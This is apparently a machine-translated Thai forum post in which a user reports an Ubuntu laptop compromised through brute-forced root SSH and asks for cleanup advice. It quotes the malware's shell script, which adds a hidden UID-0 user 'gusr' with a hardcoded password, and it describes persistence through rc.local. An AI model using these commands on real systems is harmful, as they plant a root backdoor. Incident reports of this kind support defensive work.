ฉันค่อนข้างแน่ใจว่าแล็ปท็อป Ubuntu 13.10 ของฉันติดมัลแวร์บางประเภท
ทุกครั้งที่ฉันพบกระบวนการ / lib / sshd (เป็นเจ้าของโดย root) ทำงานและใช้ cpu มากมาย ไม่ใช่เซิร์ฟเวอร์ sshd ที่รัน / usr / sbin / sshd
ไบนารีมีสิทธิ์ --wxrw-rwt และสร้างและวางไข่สคริปต์ในไดเรกทอรี / lib ชื่อล่าสุดคือ 13959730401387633604 และทำสิ่งต่อไปนี้
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
ผู้ใช้ gusr ถูกสร้างขึ้นโดยมัลแวร์อย่างอิสระจากนั้น chpasswd จะหยุดทำงานในขณะที่ใช้ CPU 100%
จนถึงตอนนี้ฉันได้ระบุว่าผู้ใช้ gusr ถูกเพิ่มเข้าไปในไฟล์ใน / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
ดูเหมือนว่ามัลแวร์ทำสำเนาของไฟล์เหล่านี้ทั้งหมดด้วยส่วนต่อท้าย "-" รายการเต็มรูปแบบของไฟล์ / etc / ไฟล์ที่ได้รับการแก้ไขโดยรากสามารถใช้ได้ที่นี่
นอกจากนี้ไฟล์ / etc / hosts ก็เปลี่ยนไปนี้
กระบวนการ / lib / sshd เริ่มต้นด้วยการเพิ่มตัวเองลงในตอนท้ายของไฟล์ /etc/init.d/rc.local!
ฉันได้ลบผู้ใช้ลบไฟล์ฆ่าโครงสร้างของประมวลผลเปลี่ยนรหัสผ่านของฉันและลบคีย์สาธารณะ ssh
ฉันรู้ว่าฉันถูกเมาโดยทั่วไปและฉันจะติดตั้งทั้งระบบใหม่ อย่างไรก็ตามตั้งแต่ฉันเข้าสู่ระบบไปยังเครื่องอื่น ๆ หลาย ๆ เครื่องมันจะเป็นการดีถ้าอย่างน้อยฉันก็พยายามที่จะลบมันออก ข้อเสนอแนะใด ๆ เกี่ยวกับวิธีการเกี่ยวกับเรื่องนี้จะได้รับการชื่นชม
ดูเหมือนว่าพวกเขาจะเข้ามาในวันที่ 25 มีนาคมโดยการเข้าสู่ระบบรูทบังคับ ฉันไม่ทราบว่ารูท ssh เปิดใช้งานโดยค่าเริ่มต้นใน Ubuntu ฉันปิดการใช้งานและวาง denyhosts
การเข้าสู่ระบบมาจาก 59.188.247.236 มีบางแห่งในฮ่องกงที่เห็นได้ชัด
ฉันได้แล็ปท็อปจาก EmperorLinux และพวกเขาเปิดใช้งานการเข้าถึงรูต หากคุณมีหนึ่งในนั้นและคุณใช้ sshd ระวัง
Linux/Eburyผมค่อนข้างมั่นใจว่านี้ไม่ได้ เป็นอย่างอื่นและอาจไม่มีชื่อที่กำหนด Ebury จะไม่สร้างบัญชีผู้ใช้ใหม่และจะแก้ไขไลบรารีที่แบ่งใช้ที่ใช้โดย openssh โดยไม่ลดลงในไบนารีใหม่ที่ชื่อว่า sshd